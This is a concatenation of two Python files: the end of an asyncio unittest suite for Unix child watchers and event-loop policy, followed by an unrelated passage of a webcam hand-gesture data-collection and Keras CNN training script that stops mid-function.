            self.assertGreater(pid, 0)
        try:
            if pid < 0:
                return self.zombies.popitem()
            else:
                return pid, self.zombies.pop(pid)
        except KeyError:
            pass
        if self.running:
            return 0, 0
        else:
            raise ChildProcessError()

    def add_zombie(self, pid, returncode):
        # Encode the returncode with the same bias WIFEXITED/WTERMSIG decode.
        self.zombies[pid] = returncode + 32768

    def WIFEXITED(self, status):
        return status >= 32768

    def WIFSIGNALED(self, status):
        return 32700 < status < 32768

    def WEXITSTATUS(self, status):
        self.assertTrue(self.WIFEXITED(status))
        return status - 32768

    def WTERMSIG(self, status):
        self.assertTrue(self.WIFSIGNALED(status))
        return 32768 - status

    def test_create_watcher(self):
        self.m_add_signal_handler.assert_called_once_with(
            signal.SIGCHLD, self.watcher._sig_chld)

    def waitpid_mocks(func):
        # Decorator: patch the os wait APIs with the fakes above for one test.
        def wrapped_func(self):
            def patch(target, wrapper):
                return mock.patch(target, wraps=wrapper,
                                  new_callable=mock.Mock)

            with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
                 patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
                 patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
                 patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
                 patch('os.waitpid', self.waitpid) as m_waitpid:
                func(self, WaitPidMocks(m_waitpid,
                                        m_WIFEXITED, m_WIFSIGNALED,
                                        m_WEXITSTATUS, m_WTERMSIG,
                                        ))
        return wrapped_func

    @waitpid_mocks
    def test_sigchld(self, m):
        # register a child
        callback = mock.Mock()

        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(42, callback, 9, 10, 14)

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child is running
        self.watcher._sig_chld()

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child terminates (returncode 12)
        self.running = False
        self.add_zombie(42, 12)
        self.watcher._sig_chld()

        self.assertTrue(m.WIFEXITED.called)
        self.assertTrue(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)
        callback.assert_called_once_with(42, 12, 9, 10, 14)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WEXITSTATUS.reset_mock()
        callback.reset_mock()

        # ensure that the child is effectively reaped
        self.add_zombie(42, 13)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback.called)
        self.assertFalse(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WEXITSTATUS.reset_mock()

        # sigchld called again
        self.zombies.clear()
        self.watcher._sig_chld()

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

    @waitpid_mocks
    def test_sigchld_two_children(self, m):
        callback1 = mock.Mock()
        callback2 = mock.Mock()

        # register child 1
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(43, callback1, 7, 8)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # register child 2
        with self.watcher:
            self.watcher.add_child_handler(44, callback2, 147, 18)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # children are running
        self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child 1 terminates (signal 3)
        self.add_zombie(43, -3)
        self.watcher._sig_chld()

        callback1.assert_called_once_with(43, -3, 7, 8)
        self.assertFalse(callback2.called)
        self.assertTrue(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertTrue(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WTERMSIG.reset_mock()
        callback1.reset_mock()

        # child 2 still running
        self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child 2 terminates (code 108)
        self.add_zombie(44, 108)
        self.running = False
        self.watcher._sig_chld()

        callback2.assert_called_once_with(44, 108, 147, 18)
        self.assertFalse(callback1.called)
        self.assertTrue(m.WIFEXITED.called)
        self.assertTrue(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WEXITSTATUS.reset_mock()
        callback2.reset_mock()

        # ensure that the children are effectively reaped
        self.add_zombie(43, 14)
        self.add_zombie(44, 15)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WEXITSTATUS.reset_mock()

        # sigchld called again
        self.zombies.clear()
        self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

    @waitpid_mocks
    def test_sigchld_two_children_terminating_together(self, m):
        callback1 = mock.Mock()
        callback2 = mock.Mock()

        # register child 1
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(45, callback1, 17, 8)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # register child 2
        with self.watcher:
            self.watcher.add_child_handler(46, callback2, 1147, 18)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # children are running
        self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child 1 terminates (code 78)
        # child 2 terminates (signal 5)
        self.add_zombie(45, 78)
        self.add_zombie(46, -5)
        self.running = False
        self.watcher._sig_chld()

        callback1.assert_called_once_with(45, 78, 17, 8)
        callback2.assert_called_once_with(46, -5, 1147, 18)
        self.assertTrue(m.WIFSIGNALED.called)
        self.assertTrue(m.WIFEXITED.called)
        self.assertTrue(m.WEXITSTATUS.called)
        self.assertTrue(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WTERMSIG.reset_mock()
        m.WEXITSTATUS.reset_mock()
        callback1.reset_mock()
        callback2.reset_mock()

        # ensure that the children are effectively reaped
        self.add_zombie(45, 14)
        self.add_zombie(46, 15)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WTERMSIG.called)

    @waitpid_mocks
    def test_sigchld_race_condition(self, m):
        # register a child
        callback = mock.Mock()

        with self.watcher:
            # child terminates before being registered
            self.add_zombie(50, 4)
            self.watcher._sig_chld()

            self.watcher.add_child_handler(50, callback, 1, 12)

        callback.assert_called_once_with(50, 4, 1, 12)
        callback.reset_mock()

        # ensure that the child is effectively reaped
        self.add_zombie(50, -1)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback.called)

    @waitpid_mocks
    def test_sigchld_replace_handler(self, m):
        callback1 = mock.Mock()
        callback2 = mock.Mock()

        # register a child
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(51, callback1, 19)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # register the same child again
        with self.watcher:
            self.watcher.add_child_handler(51, callback2, 21)

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child terminates (signal 8)
        self.running = False
        self.add_zombie(51, -8)
        self.watcher._sig_chld()

        callback2.assert_called_once_with(51, -8, 21)
        self.assertFalse(callback1.called)
        self.assertTrue(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertTrue(m.WTERMSIG.called)

        m.WIFSIGNALED.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WTERMSIG.reset_mock()
        callback2.reset_mock()

        # ensure that the child is effectively reaped
        self.add_zombie(51, 13)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(m.WTERMSIG.called)

    @waitpid_mocks
    def test_sigchld_remove_handler(self, m):
        callback = mock.Mock()

        # register a child
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(52, callback, 1984)

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # unregister the child
        self.watcher.remove_child_handler(52)

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child terminates (code 99)
        self.running = False
        self.add_zombie(52, 99)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback.called)

    @waitpid_mocks
    def test_sigchld_unknown_status(self, m):
        callback = mock.Mock()

        # register a child
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(53, callback, -19)

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # terminate with unknown status
        self.zombies[53] = 1178
        self.running = False
        self.watcher._sig_chld()

        callback.assert_called_once_with(53, 1178, -19)
        self.assertTrue(m.WIFEXITED.called)
        self.assertTrue(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        callback.reset_mock()
        m.WIFEXITED.reset_mock()
        m.WIFSIGNALED.reset_mock()

        # ensure that the child is effectively reaped
        self.add_zombie(53, 101)
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback.called)

    @waitpid_mocks
    def test_remove_child_handler(self, m):
        callback1 = mock.Mock()
        callback2 = mock.Mock()
        callback3 = mock.Mock()

        # register children
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(54, callback1, 1)
            self.watcher.add_child_handler(55, callback2, 2)
            self.watcher.add_child_handler(56, callback3, 3)

        # remove child handler 1
        self.assertTrue(self.watcher.remove_child_handler(54))

        # remove child handler 2 multiple times
        self.assertTrue(self.watcher.remove_child_handler(55))
        self.assertFalse(self.watcher.remove_child_handler(55))
        self.assertFalse(self.watcher.remove_child_handler(55))

        # all children terminate
        self.add_zombie(54, 0)
        self.add_zombie(55, 1)
        self.add_zombie(56, 2)
        self.running = False
        with self.ignore_warnings:
            self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        callback3.assert_called_once_with(56, 2, 3)

    @waitpid_mocks
    def test_sigchld_unhandled_exception(self, m):
        callback = mock.Mock()

        # register a child
        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(57, callback)

        # raise an exception
        m.waitpid.side_effect = ValueError

        with mock.patch.object(log.logger, 'error') as m_error:
            self.assertEqual(self.watcher._sig_chld(), None)
            self.assertTrue(m_error.called)

    @waitpid_mocks
    def test_sigchld_child_reaped_elsewhere(self, m):
        # register a child
        callback = mock.Mock()

        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(58, callback)

        self.assertFalse(callback.called)
        self.assertFalse(m.WIFEXITED.called)
        self.assertFalse(m.WIFSIGNALED.called)
        self.assertFalse(m.WEXITSTATUS.called)
        self.assertFalse(m.WTERMSIG.called)

        # child terminates
        self.running = False
        self.add_zombie(58, 4)

        # waitpid is called elsewhere
        os.waitpid(58, os.WNOHANG)

        m.waitpid.reset_mock()

        # sigchld
        with self.ignore_warnings:
            self.watcher._sig_chld()

        if isinstance(self.watcher, asyncio.FastChildWatcher):
            # here the FastChildWatcher enters a deadlock
            # (there is no way to prevent it)
            self.assertFalse(callback.called)
        else:
            callback.assert_called_once_with(58, 255)

    @waitpid_mocks
    def test_sigchld_unknown_pid_during_registration(self, m):
        # register two children
        callback1 = mock.Mock()
        callback2 = mock.Mock()

        with self.ignore_warnings, self.watcher:
            self.running = True
            # child 1 terminates
            self.add_zombie(591, 7)
            # an unknown child terminates
            self.add_zombie(593, 17)

            self.watcher._sig_chld()

            self.watcher.add_child_handler(591, callback1)
            self.watcher.add_child_handler(592, callback2)

        callback1.assert_called_once_with(591, 7)
        self.assertFalse(callback2.called)

    @waitpid_mocks
    def test_set_loop(self, m):
        # register a child
        callback = mock.Mock()

        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(60, callback)

        # attach a new loop
        old_loop = self.loop
        self.loop = self.new_test_loop()
        patch = mock.patch.object

        with patch(old_loop, "remove_signal_handler") as m_old_remove, \
             patch(self.loop, "add_signal_handler") as m_new_add:

            self.watcher.attach_loop(self.loop)

            m_old_remove.assert_called_once_with(
                signal.SIGCHLD)
            m_new_add.assert_called_once_with(
                signal.SIGCHLD, self.watcher._sig_chld)

        # child terminates
        self.running = False
        self.add_zombie(60, 9)
        self.watcher._sig_chld()

        callback.assert_called_once_with(60, 9)

    @waitpid_mocks
    def test_set_loop_race_condition(self, m):
        # register 3 children
        callback1 = mock.Mock()
        callback2 = mock.Mock()
        callback3 = mock.Mock()

        with self.watcher:
            self.running = True
            self.watcher.add_child_handler(61, callback1)
            self.watcher.add_child_handler(62, callback2)
            self.watcher.add_child_handler(622, callback3)

        # detach the loop
        old_loop = self.loop
        self.loop = None

        with mock.patch.object(
                old_loop, "remove_signal_handler") as m_remove_signal_handler:

            with self.assertWarnsRegex(
                    RuntimeWarning, 'A loop is being detached'):
                self.watcher.attach_loop(None)

            m_remove_signal_handler.assert_called_once_with(
                signal.SIGCHLD)

        # child 1 & 2 terminate
        self.add_zombie(61, 11)
        self.add_zombie(62, -5)

        # SIGCHLD was not caught
        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        self.assertFalse(callback3.called)

        # attach a new loop
        self.loop = self.new_test_loop()

        with mock.patch.object(
                self.loop, "add_signal_handler") as m_add_signal_handler:

            self.watcher.attach_loop(self.loop)

            m_add_signal_handler.assert_called_once_with(
                signal.SIGCHLD, self.watcher._sig_chld)
            callback1.assert_called_once_with(61, 11)  # race condition!
            callback2.assert_called_once_with(62, -5)  # race condition!
            self.assertFalse(callback3.called)

        callback1.reset_mock()
        callback2.reset_mock()

        # child 3 terminates
        self.running = False
        self.add_zombie(622, 19)
        self.watcher._sig_chld()

        self.assertFalse(callback1.called)
        self.assertFalse(callback2.called)
        callback3.assert_called_once_with(622, 19)

    @waitpid_mocks
    def test_close(self, m):
        # register two children
        callback1 = mock.Mock()

        with self.watcher:
            self.running = True
            # child 1 terminates
            self.add_zombie(63, 9)
            # other child terminates
            self.add_zombie(65, 18)
            self.watcher._sig_chld()

            self.watcher.add_child_handler(63, callback1)
            self.watcher.add_child_handler(64, callback1)

            self.assertEqual(len(self.watcher._callbacks), 1)
            if isinstance(self.watcher, asyncio.FastChildWatcher):
                self.assertEqual(len(self.watcher._zombies), 1)

            with mock.patch.object(
                    self.loop,
                    "remove_signal_handler") as m_remove_signal_handler:

                self.watcher.close()

                m_remove_signal_handler.assert_called_once_with(
                    signal.SIGCHLD)
                self.assertFalse(self.watcher._callbacks)
                if isinstance(self.watcher, asyncio.FastChildWatcher):
                    self.assertFalse(self.watcher._zombies)

    @waitpid_mocks
    def test_add_child_handler_with_no_loop_attached(self, m):
        callback = mock.Mock()
        with self.create_watcher() as watcher:
            with self.assertRaisesRegex(
                    RuntimeError,
                    'the child watcher does not have a loop attached'):
                watcher.add_child_handler(100, callback)


class SafeChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
    def create_watcher(self):
        return asyncio.SafeChildWatcher()


class FastChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
    def create_watcher(self):
        return asyncio.FastChildWatcher()


class PolicyTests(unittest.TestCase):
    """Child-watcher behaviour of the default event loop policy."""

    def create_policy(self):
        return asyncio.DefaultEventLoopPolicy()

    def test_get_child_watcher(self):
        policy = self.create_policy()
        self.assertIsNone(policy._watcher)

        watcher = policy.get_child_watcher()
        self.assertIsInstance(watcher, asyncio.SafeChildWatcher)

        self.assertIs(policy._watcher, watcher)

        self.assertIs(watcher, policy.get_child_watcher())
        self.assertIsNone(watcher._loop)

    def test_get_child_watcher_after_set(self):
        policy = self.create_policy()
        watcher = asyncio.FastChildWatcher()

        policy.set_child_watcher(watcher)
        self.assertIs(policy._watcher, watcher)
        self.assertIs(watcher, policy.get_child_watcher())

    def test_get_child_watcher_with_mainloop_existing(self):
        policy = self.create_policy()
        loop = policy.get_event_loop()

        self.assertIsNone(policy._watcher)
        watcher = policy.get_child_watcher()

        self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
        self.assertIs(watcher._loop, loop)

        loop.close()

    def test_get_child_watcher_thread(self):
        # The watcher only binds to the loop when created on the main thread.

        def f():
            policy.set_event_loop(policy.new_event_loop())

            self.assertIsInstance(policy.get_event_loop(),
                                  asyncio.AbstractEventLoop)
            watcher = policy.get_child_watcher()

            self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
            self.assertIsNone(watcher._loop)

            policy.get_event_loop().close()

        policy = self.create_policy()
        policy.set_child_watcher(asyncio.SafeChildWatcher())

        th = threading.Thread(target=f)
        th.start()
        th.join()

    def test_child_watcher_replace_mainloop_existing(self):
        policy = self.create_policy()
        loop = policy.get_event_loop()

        watcher = policy.get_child_watcher()

        self.assertIs(watcher._loop, loop)

        new_loop = policy.new_event_loop()
        policy.set_event_loop(new_loop)

        self.assertIs(watcher._loop, new_loop)

        policy.set_event_loop(None)

        self.assertIs(watcher._loop, None)

        loop.close()
        new_loop.close()


class TestFunctional(unittest.TestCase):
    """End-to-end checks against a real (non-mocked) event loop."""

    def setUp(self):
        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)

    def tearDown(self):
        self.loop.close()
        asyncio.set_event_loop(None)

    def test_add_reader_invalid_argument(self):
        def assert_raises():
            return self.assertRaisesRegex(ValueError, r'Invalid file object')

        cb = lambda: None

        with assert_raises():
            self.loop.add_reader(object(), cb)

        with assert_raises():
            self.loop.add_writer(object(), cb)

        with assert_raises():
            self.loop.remove_reader(object())

        with assert_raises():
            self.loop.remove_writer(object())

    def test_add_reader_or_writer_transport_fd(self):
        # A fd owned by a transport must be rejected by add/remove reader/writer.
        def assert_raises():
            return self.assertRaisesRegex(
                RuntimeError,
                r'File descriptor .* is used by transport')

        async def runner():
            tr, pr = await self.loop.create_connection(
                lambda: asyncio.Protocol(), sock=rsock)

            try:
                cb = lambda: None

                with assert_raises():
                    self.loop.add_reader(rsock, cb)
                with assert_raises():
                    self.loop.add_reader(rsock.fileno(), cb)

                with assert_raises():
                    self.loop.remove_reader(rsock)
                with assert_raises():
                    self.loop.remove_reader(rsock.fileno())

                with assert_raises():
                    self.loop.add_writer(rsock, cb)
                with assert_raises():
                    self.loop.add_writer(rsock.fileno(), cb)

                with assert_raises():
                    self.loop.remove_writer(rsock)
                with assert_raises():
                    self.loop.remove_writer(rsock.fileno())
            finally:
                tr.close()

        rsock, wsock = socket.socketpair()
        try:
            self.loop.run_until_complete(runner())
        finally:
            rsock.close()
            wsock.close()


if __name__ == '__main__':
    unittest.main()
# ---- file boundary: generate_data.py (next chunk is an unrelated script) ----
# generate_data.py -- Tk front end for collecting hand-gesture images from a
# webcam, training a small Keras CNN on them, and running live prediction.
#
# NOTE(review): written against the Keras 1.x API (output_dim, fit_generator,
# nb_epoch, samples_per_epoch); the hard-coded C:\Users\... dataset paths must
# match the local machine -- confirm before running elsewhere.
import cv2
from time import sleep
import os
from tkinter import *
from keras.utils import plot_model
from keras.models import Sequential, model_from_json
from keras.layers import Convolution2D, Dropout, Dense, Flatten, MaxPooling2D
from keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array
from numpy import array
from keras import regularizers
from keras import backend as K
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
import threading
from matplotlib.pyplot import imshow
import pathlib
import tkinter as ttk
import shutil


def add():
    """Record images for a new gesture into Dataset/{training_set,test_set}/<name>.

    The gesture name is read from the Tk entry box (via close_window()).
    One frame is captured per Enter key press; ESC (or reaching the per-split
    quota) stops recording for that split.
    """
    if not os.path.exists("Dataset"): os.mkdir("Dataset")
    if not os.path.exists("Dataset/training_set"): os.mkdir("Dataset/training_set")
    if not os.path.exists("Dataset/test_set"): os.mkdir("Dataset/test_set")
    # Read the entry box once; the original called close_window() twice to
    # build "<name>/<name>", which returned the same text both times.
    gesture = close_window()
    dirs = [gesture + '/' + gesture]
    sets = {'training_set': 10000, 'test_set': 1000}  # max images per split
    for set_name in sets:
        # BUG FIX: the original tested os.path.exists("Dataset") here, so
        # "Dataset/<set_name>" was never created by this guard once "Dataset"
        # existed (it only worked because of the explicit mkdirs above).
        if not os.path.exists("Dataset/{}".format(set_name)):
            os.mkdir("Dataset/{}".format(set_name))
        for dir_name in dirs:
            sub = os.path.basename(dir_name)
            if not os.path.exists("Dataset/{}/{}".format(set_name, sub)):
                os.mkdir("Dataset/{}/{}".format(set_name, sub))
            vc = cv2.VideoCapture(0)
            if vc.isOpened():
                rval, frame = vc.read()
            else:
                rval = False
            index = 0
            while rval:
                input()  # wait for Enter before keeping the current frame
                frame = frame[200:400, 300:500]  # crop to the green box
                frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
                frame = frame.reshape((1,) + frame.shape)
                frame = frame.reshape(frame.shape + (1,))
                cv2.destroyWindow("preview")
                index += 1
                rval, frame = vc.read()
                frame = cv2.flip(frame, 1)  # mirror for a natural preview
                # BUG FIX: on-screen message was truncated ("insid").
                cv2.putText(frame, "Keep your hand inside", (20, 50),
                            cv2.FONT_HERSHEY_PLAIN, 1, 255)
                cv2.putText(frame, "Taking images for {} dataset".format(dir_name),
                            (20, 80), cv2.FONT_HERSHEY_PLAIN, 1, 255)
                cv2.rectangle(frame, (300, 200), (500, 400), (0, 255, 0), 1)
                cv2.imshow("Recording", frame)
                # Persist only the region inside the rectangle.
                cv2.imwrite("Dataset/{}/".format(set_name) + str(dir_name)
                            + "{}.jpg".format(index), frame[200:400, 300:500])
                print("images taken: {}".format(index))
                key = cv2.waitKey(20)
                if key == 27 or index == sets[set_name]:  # ESC or quota reached
                    break
            cv2.destroyWindow("Recording")
            vc = None


def train():
    """Build, train and persist the CNN from Dataset/ on disk.

    Saves weights.hdf5, model.json and a model.png schema plot; the number of
    output units is the current number of gesture folders (num()).
    """
    model = Sequential()
    # Two conv/pool stages over 200x200 grayscale input.
    model.add(Convolution2D(32, 3, 3, input_shape=(200, 200, 1), activation='relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Convolution2D(32, 3, 3, input_shape=(200, 200, 1), activation='relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.5))  # reduce overfitting
    model.add(Flatten())
    # Three dense hidden layers, each L2-regularized and followed by dropout.
    model.add(Dense(output_dim=150, activation='relu',
                    kernel_regularizer=regularizers.l2(0.01)))
    model.add(Dropout(0.5))
    model.add(Dense(output_dim=150, activation='relu',
                    kernel_regularizer=regularizers.l2(0.01)))
    model.add(Dropout(0.5))
    model.add(Dense(output_dim=150, activation='relu',
                    kernel_regularizer=regularizers.l2(0.01)))
    # One output unit per gesture class currently on disk.
    model.add(Dense(output_dim=num(), activation='sigmoid'))
    model.compile(optimizer='adam', loss='categorical_crossentropy',
                  metrics=['accuracy'])
    # Generate training and test batches straight from the folders.
    train_datagen = ImageDataGenerator(
        rescale=1. / 255,
        shear_range=0.2,
        zoom_range=0.,
        horizontal_flip=False)
    test_datagen = ImageDataGenerator(rescale=1. / 255)
    training_set = train_datagen.flow_from_directory(
        r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set",
        target_size=(200, 200), color_mode='grayscale',
        batch_size=10, class_mode='categorical')
    test_set = test_datagen.flow_from_directory(
        r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\test_set",
        target_size=(200, 200), color_mode='grayscale',
        batch_size=10, class_mode='categorical')
    model.fit_generator(training_set,
                        samples_per_epoch=19707,
                        nb_epoch=10,
                        validation_data=test_set,
                        nb_val_samples=320)
    # After 10 epochs (historical run): train acc 0.9005 / loss 0.4212,
    # test acc 0.8813 / loss 0.5387.
    model.save_weights("weights.hdf5", overwrite=True)
    model_json = model.to_json()
    with open("model.json", "w") as model_file:
        model_file.write(model_json)
    print("Model has been saved.")
    # Smoke-test the freshly trained model on one known test image.
    img = load_img('Dataset/test_set/five/five26.jpg', target_size=(200, 200))
    x = array(img)
    img = cv2.cvtColor(x, cv2.COLOR_RGB2GRAY)
    img = img.reshape((1,) + img.shape)
    img = img.reshape(img.shape + (1,))
    test_datagen = ImageDataGenerator(rescale=1. / 255)
    m = test_datagen.flow(img, batch_size=1)
    y_pred = model.predict_generator(m, 1)
    # Save the model schema as a picture.
    plot_model(model, to_file='model.png', show_shapes=True)


# Latest per-class prediction scores, shared with the (commented-out)
# histogram animation via update().
histarray = {'Empty': 0, 'One': 0, 'Tow': 0, 'Zero': 0}


def num():
    """Return the number of gesture classes (entries in the training_set dir).

    BUG FIX: the original did os.chdir(path) and never restored the previous
    working directory, silently redirecting every relative path used later
    (weights.hdf5, model.json, Dataset/...). Count without touching the cwd.
    """
    path = r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set"
    return len(os.listdir(path))


def load_model():
    """Load model.json + weights.hdf5 and return the compiled model, or None
    when the saved model is missing/unreadable."""
    try:
        with open('model.json', 'r') as json_file:
            loaded_model_json = json_file.read()
        model = model_from_json(loaded_model_json)
        model.load_weights("weights.hdf5")
        print("Model successfully loaded from disk.")
        # Compile again so the loaded model is usable for evaluation.
        model.compile(optimizer='adam', loss='categorical_crossentropy',
                      metrics=['accuracy'])
        return model
    except Exception:  # was a bare except; narrowed, same fallback behavior
        print("""Model not found. Please train the CNN by running the script cnn_train.py. Note that the training and test samples should be properly set up in the dataset directory.""")
        return None


def visualize(img, layer_index=0, filter_index=0, all_filters=False):
    """Show the activation(s) of one model layer for a PIL image.

    With all_filters=True, plots every filter of the layer in a grid;
    otherwise shows the single filter at filter_index.
    Uses the module-level `model` loaded at import time.
    """
    act_fun = K.function([model.layers[0].input, K.learning_phase()],
                         [model.layers[layer_index].output, ])
    x = img_to_array(img)
    img = cv2.cvtColor(x, cv2.COLOR_RGB2GRAY)
    img = img.reshape(img.shape + (1,))
    img = img.reshape((1,) + img.shape)
    img = act_fun([img, 0])[0]  # 0 = test phase
    if all_filters:
        fig = plt.figure(figsize=(7, 7))
        filters = len(img[0, 0, 0, :])
        for i in range(filters):
            plot = fig.add_subplot(6, 6, i + 1)
            plot.imshow(img[0, :, :, i], 'gray')
            plt.xticks(np.array([]))
            plt.yticks(np.array([]))
            plt.tight_layout()
    else:
        img = np.rollaxis(img, 3, 1)
        img = img[0][filter_index]
        print(img.shape)
        imshow(img)


def update(histarray2):
    """Publish the latest prediction scores for the histogram animation."""
    global histarray
    histarray = histarray2


def realtime():
    """Live prediction loop: grab webcam frames, classify the green-box crop
    with the loaded model, and print the winning class until ESC is pressed."""
    cv2.namedWindow("preview")
    vc = cv2.VideoCapture(0)
    if vc.isOpened():
        rval, frame = vc.read()
    else:
        rval = False
    # NOTE(review): these labels and the histarray2 keys below disagree
    # ('tow' vs 'Three') -- kept as-is; confirm the intended class set.
    classes = ["empty", "one", "tow", "zero"]
    while rval:
        frame = cv2.flip(frame, 1)
        cv2.rectangle(frame, (300, 200), (500, 400), (0, 255, 0), 1)
        cv2.putText(frame, "Place your hand in the green box.", (50, 50),
                    cv2.FONT_HERSHEY_PLAIN, 1, 255)
        cv2.putText(frame, "Press esc to exit.", (50, 100),
                    cv2.FONT_HERSHEY_PLAIN, 1, 255)
